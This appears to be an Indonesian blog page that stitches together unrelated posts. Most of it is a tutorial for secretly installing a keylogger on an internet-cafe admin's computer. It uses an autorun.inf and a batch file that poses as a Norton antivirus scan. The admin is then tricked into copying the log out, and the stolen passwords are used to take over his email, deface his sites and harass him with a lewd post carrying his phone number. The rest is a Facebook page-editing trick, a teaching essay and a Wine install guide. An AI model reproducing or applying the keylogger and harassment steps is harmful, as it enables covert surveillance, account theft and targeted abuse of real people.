exploit-exploit yang dulu dibangga-banggakan oleh kaum newbie menjadi
"rongsokan" tak berguna.

Sekarang, mari kita bangunkan sang admin dari mimpi indahnya untuk menunjukkan
bahwa menjadi paranoid itu adakalanya tidak baik dan tidak ada system yang
100% secure.

2. Serangan pertama

Kita akan menjadi seorang "agen mata-mata" (hehehe.. gw pake istilah ini biar
ente merasa agak sedikit keren) yang akan merekam segala aktivitas sang admin.
Tujuannya.. banyak! dan salah satunya seperti hal yang banyak diinginkan
orang... mendapatkan password sang admin. Partner kita kali ini adalah
navw32.exe, sebuah keyloger dengan icon Norton AntiVirus yang bisa kamu
dapatkan suka-suka dengan harga cuma-cuma di halaman member www.spyrozone.net
kategori Keyloger. Setelah kamu download keyloger tersebut, ikuti langkah -
langkah berikut:

---[1 Bukalah Notepad kemudian ketik baris script berikut:

[autorun]
open=nav.bat

Klik [file][save] kemudian pada box save as type, pilih All Files dan pada
form isian name beri nama Autorun.inf lalu klik tombol [save].

—[2 Buka lembar baru pada notepad dengan klik menu [file] [new] lalu ketik
script berikut:

@echo off
echo Norton Antivirus 2006
echo Scanning disk drive…
echo Please wait…
copy navw32.exe %windir%\navw32.exe
call %windir%\navw32.exe
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo. Scanning complette! No virus threat detected!
echo.
cls

Klik [file][save] kemudian pada box save as type, pilih All Files dan pada
form isian name beri nama nav.bat lalu klik tombol [save].

—[3. Persiapkan beberapa file microsoft word documents (bisa diganti dengan
file lain) sebagai tipuan/alasan untuk di transfer. Semakin banyak file,
semakin baik karena file keyloger kamu akan semakin tersamarkan.

—[4. Persiapkan sebuah cd kosong (bekas juga boleh) lalu bakar semua file
diatas (autorun.inf, nav.bat, navw32.exe dan file-file tipuan) kedalam CD.

Sekarang pergilah ke warnet tempat sang admin berkuasa. Bersikaplah seperti
biasa dan jangan gugup selayaknya para koruptor yang sering nampang di
satasion-stasion TI-PI tanpa rasa malu. Setelah kamu login ke billing komputer
user, datangi sang admin. Katakan pada beliau, “Mas/mbak/om/tante/, mau
transfer file dari cd ini. Nama filenya blablabla tolong dikirim ke komputer
nomor blablabla.”

Begitu CD dimasukkan, saat itulah terjadi sebuah fenomena berikut:
Komputer akan memproses file autorun.inf secara otomatis —> file autorun.inf
akan memproses file nav.bat —> file nav.bat akan menduplikasi file
navw32.exe ke dalam directory windows dan mengaktivkannya —> Keyloger telah
terinstall, hasil rekamannya akan tersimpan di directory yang sama dengan nama
navw32.dll beratribut hidden.

Perlu diketahui bahwa keyloger ini tidak akan menampilkan kotak dialog dalam
bentuk apapun! So, nggak usah khawatir bakal ketahuan ;)

Sekarang, kamu bisa pulang dengan wajah tanpa dosa dan mungkin (lagi – lagi)
kamu bakalan senyum-senyum sendiri sambil mengelus-elus jenggot kayak habis
menang togel.

Lalu bagaimana cara mengambil file hasil rekaman keyloger di directory windows
sang admin? Ikuti langkah-langkah pada serangan kedua.

3. Serangan kedua

Dua hari Kemudian, datanglah ke warnet itu lagi. Bertingkahlakulah secara
wajar dan beraktivitas seperti layaknya user biasa. Setelah selesai
berinternet ria, datangi sang admin, bayarlah biaya browsing seperti biasa
lalu dengan wajah sangat-sangat memelas seperti pengemis di jalanan :) katakan
pada beliau,”Mas/mbak/om/tante/, komputer saya bermasalah neeh. Menurut pesan
Error yang muncul, file navw32.dll yang berada di directory windows hilang.
File tersebut beratribut hidden. Tolong doong copykan dari komputer ini.
Kebetulan versi windowsnya sama dengan komputer saya..”

Tentu saja biasanya sang admin dengan sangat senang hati akan membantu kamu.
Dengan suka rela dan penuh kesadaran beliau akan mengaktifkan opsi Show All
files pada Folder Options dan mengcopy-kan file navw32.dll dari directory
windows tanpa menyadari bahwa file tersebut bukan file system, namun file
hasil rekaman keyloger.

Berikan disket/cd/flashdisk mu dan setelah file tersebut tersimpan, ucapkan
beribu terima kasih lalu pulanglah ke rumah. Buka file tersebut di rumah. Klik
2x pada file lalu ketika muncul kotak dialog open with, klik opsi select
program from a list dan pilih notepad pada daftar program yang ditampilkan.
Sekarang tentunya kamu bisa leluasa membaca rekaman aktivitas sang admin. Cari
password emailnya dan kamu bisa menuju pada hari pembalasan.

4. Hari Pembalasan

Pilih hari yang tepat, misalnya malam jum’at kliwon dimana sang admin mungkin
sedang terlelap di rumahnya. Nyalakan komputermu dan connectlah ke Internet.
Namun ada baiknya kamu lakukan hal ini di warnet agar lebih aman. Carilah
warnet yang buka 24 jam.

Berbekal hasil rekaman keyloger tadi, loginlah ke account email sang admin.
Setelah puas menjelajahi emailnya, subscriblah ke berbagai mailing list besar
dengan email tersebut. Subscribe sebanyak-banyaknya.

Hohoho.. lalu apa lagi nich?? Kalau sang admin punya blog/website pribadi/
account Friendster.. tentu kamu dengan mudah mendapatkan semua password itu
dengan fasilitas forgot password. Kebanyakan penyedia layanan seperti itu akan
mengirimkan password via email. So, setelah dapat semuanya… heheh… DEFACE
ajah ;) Tapi inget lho, halaman lama harus tetap di backup dan jangan merubah
password apapun!!

Ada ide yang sedikit lebih sadis (ini cuma ide lho.. sebaiknya jangan
dilakukan deech..). Daftarkan emailnya ke berbagai situs – situs porno dan
postinglah sebuah pesan singkat, memikat dan “mematikan”. Berikut contohnya
jika milis tersebut berbahasa Indonesia:

Dear all..
gwe lagi nafsu berat neeh, burun telepon gwe doong sekarang juga!! neeh no
telp gwe: 021-blablabla (masukkan no telp sang admin)
gwe tunggu 24 jam lho!!

Atau terserah kamu laah.. saya rasa kamu lebih pintar dalam memilih kata- kata
yang yahuud!! ;D

Maka bisa dipastikan malam itu akan menjadi malam jumat kliwon paling
mengerikan bagi sang admin, lebih mengerikan daripada film-film horor manapun!
Telepon rumahnya akan berdering tanpa henti dibanjiri oleh telepon dari dalam
dan luar negeri dengan maksud pembicaraan yang sudah bisa ditebak apa
maksudnya ;D

Keesokan harinya, setelah menghadapi malam paling mengerikan itu, sang admin
akan kaget 1/2 hidup 1/2 mati mendapati inboxnya penuh dengan email-email dari
berbagai milis yang beliau sendiri tidak merasa pernah bergabung dengan
milis-milis itu. Dan bisa jadi, saat beliau sedang sibuk Unsubcribe dari
milis-milis tersebut, telepon rumahnya masih terus – terusan menjerit – jerit
dengan jeritan indah :D

5. Pencegahan

Jika kamu adalah admin yang tidak mau mengalami nasib seperti diatas, maka
setiap kamu menerima CD dari siapapun..
1. Buka windows explorer
2. Tekan-tahan tombol shift sambil memasukkan CD kedalam CD Room dRive.
3. Setelah CD masuk,tetap tekan tombol shift sampai kira-kira 25 detik.Setelah
itu kamu bisa melepas tombol shift dan mengaksesnya melalui panel sebelah kiri
windows Explorer. Klik pada area folder tree, jangan pada daftar drive sebelah
kanan karena fitur autorun akan aktif.

Dan ingat, jangan terlalu percaya pada siapapun! Ada begitu banyak orang tidak
terduga di sekitar anda!!

6. Penutup

—[+ Kesimpulan
Bisa kita bayangkan sendiri betapa kelalaian sepele bisa menimbulkan dampak
yang sangat berbahaya. Ini hanya merupakan contoh Social Engineering sederhana
namun dampaknya.. bisa anda bayangkan sendiri ;)

Cara diatas sudah saya coba pada 4 buah warnet di sidoarjo dan hasilnya saya
berhasil mendapatkan catatan aktivitas sang admin (password etc..). Tapi untuk
penerapan “PEMBALASAN” tentu saya tidak melakukan hal sekejam itu ;P

Hack Facebook paling Mudah

Lagi-lagi Iseng Neh... Hehehe...
Seperti seorang Hacker Aja,padahal Gak...>.<
Kali ini Kita Akan Hack Facebook seseorang " Mau Temen, Mau Pacar, Mau Saingan..Terserah Anda Tapi Bukan bertujuan Meng Hack Accountnya.
Dengan metode berikut kita akan Acak-Acak FB orang sesuka kita, misal Hapus Photonya, Hapus Temen-temen nya dll, semau kamu.
Mari kita Mulai, Eittt Jangan Lupa Baca " BIm Salabim abra kadabra ....tolong di bantu ya..."
Harap Jangan di gunakan Berlebihan y.....

Langkah Berikut :
Syarat Utama Browser harus pakai Firefox

Pertama :
Silahkan Menuju Facebook Siapa saja, sebaiknya di coba Pakai FB Temen-temen deket dulu, biar nanti bisa minta maaf .
Oke lanjut, setelah Terbuka Silahkan Lanjutkan Kelangkah berikut... " Hati-hati Dalam melangkah...liat jalan dengan teliti.. "

Kedua :
Copy Kode Berikut :



javascript:document.body.contenEditable='true'; document.designMode='on'; void 0



Ketiga :
Hapus Alamat ( Ulr ) Facebook Teman kita tadi yang ada di Address Bar
Pastekan Kode diatas pada Address bar yg tadi di Hapus,


Setelah Terbuka Silahkan Ganti Alamat nya dengan Script diatas
Sekarang tekan ENTER
Tunggu Beberapa saat sampai Scriptnya bekerja

Keempat :
Saatnya kita Beraksi
Klik Kanan Gambar atau Photo mana Saja, Sobat Bisa hapus dengan cara Klik Delete, atau bisa sobat Pindahkan kemana saja dengan menyeret Mouse

Kelima :
Horeeeee.. Berhasil...

Keenam :
Jangan Seneng dulu, Karena ini Hanya Berlaku di Kompi kamu saja!!!

Ketujuh :
Maafkan Daku yah, karena tidak bermaksud mempermainkan Sobat
Hanya bertujuan Berbagi Ilmu

Selasa, 10 Januari 2012

Guru Jangan Anti Kritik


SECARA umum tak ada orang yang senang menerima kritik. Bagaimana pun hebatnya seseorang, ia pasti tak akan kebal dari kritik. Pertama, Karena tak ada manusia yang sempurna dan luput dari kesalahan. Kedua, Banyak orang yang senang mengkritik, meskipun mereka tahu dikritik itu tidak enak. Memang tidak semua kritik itu benar. Namun, bagaimana kita menyikapi kritik sebenarnya dapat mendorong perbaikan bagi kepribadian kita.
Demikian pula juga seharusnya bagi seorang guru. Kedewasaan berpikir menuntut seorang guru untuk menghadapi kritik, bukan malah menghindarinya. Seorang guru harus selalu siap untuk menghadapi kritik demi mencari jalan keluar, bukan untuk mencari siapa yang benar dan siapa yang salah, atau siapa yang pintar dan siapa yang bodoh.
Nah lalu bagaimana caranya seorang guru menanggapi kritik, katakanlah kritik yang datang dari murid-murid mereka?
Pertama-tama, Seorang guru jangan langsung membela diri dan menganggap semua kritik yang datang dari murid mereka itu salah. Dengarkan dulu kritiknya dan mengerti apa maksudnya. Kedua, Seorang guru harus pandai-pandai menganalisa mengapa ia dikritik sebelum ia menanggapi kritik tersebut. Jika yakin kritikan yang diterima karena si pengkritik ingin mendorong kita untuk lebih maju, terima saja kritikan mereka. Karena pada dasarnya itu adalah saran yang kita butuhkan untuk terus berkembang.
Jika kita yakin kita dikritik karena si pengkritik melihat sesuatu yang salah dari apa yang kita lakukan, jujurlah pada diri kita sendiri. Mungkin memang benar kita salah dan kita secara tidak sadar melakukannya. Akuilah kesalahan kita dan berterimakasihlah kepada mereka yang memberikan kritik. Karena mereka telah menyadarkan kita akan kesalahan kita sendiri yang mungkin dapat berakibat fatal untuk kita ke depannya.
Jika kita yakin bahwa kritik mereka adalah kritik yang sebetulnya untuk “sekedar menguji”, jawab saja kritikan mereka dengan jujur. Tentu integritas dan kemampuan kita akan terlihat jelas. Jika si pengkritik puas dengan jawaban kita, maka diapun akan mengakui bahwa kita memang memiliki integritas dan kemampuan.
Dengan demikian guru yang baik adalah guru yang selalu bersikap obyektif, terbuka untuk menerima kritik terhadap kelemahan-kelemahan yang ada pada dirinya, misalnya dalam hal caranya mengajar. Hal ini diperlukan dalam upaya perbaikan mutu pendidikan demi kepentingan anak didik sehingga benar-benar tujuan pendidikan dapat tercapai dengan baik. Keberanian melihat kesalahan sendiri dan mengakuinya tanpa mencari alasan untuk membenarkan atau mempertahankan diri dengan sikap defensif adalah titik tolak ke arah usaha perbaikan.***

Install Microsoft Office 2007 di Linux (Backtrack)

Artikel kali ini saya akan sharing tentang menginstall aplikasi office buatan microsoft di linux, distro yg saya gunakan adalah backtrack 5, versi terbaru dari linux backtrack.

ok langsung saja, hal-hal yang harus disiapkan terlebih dahulu adalah :
- 1 unit komputer dengan OS Linux ( diharuskan )
- Koneksi internet ( diwajibkan )
- Step by step buat install wine-nya terlebih dahulu :
  1.   Masuk di konsole/terminal Linux
  2.   Ketikkan perintah sudo add-apt-repository ppa:ubuntu-wine/ppa
  3.   Perintah berikutnya sudo apt-get update
  4.   Perintah terakhir sudo apt-get install wine1.3 -y
Setelah aplikasi wine sudah terinstall di linux, buka aplikasi winetricks di folder wine-nya, nti akan muncul gambar seperti dibawah ini...
 
Lalu pilih intall an app, klik ok dan akan muncul,gambar berikutnya dan akan muncul gambar berikutnya seperti gambar berikutnya…..
 
nah tuch.. ada pilihan buat install microsoft office 2007 professional, setelah itu tinggal next-next aja dach...

selamat mencoba...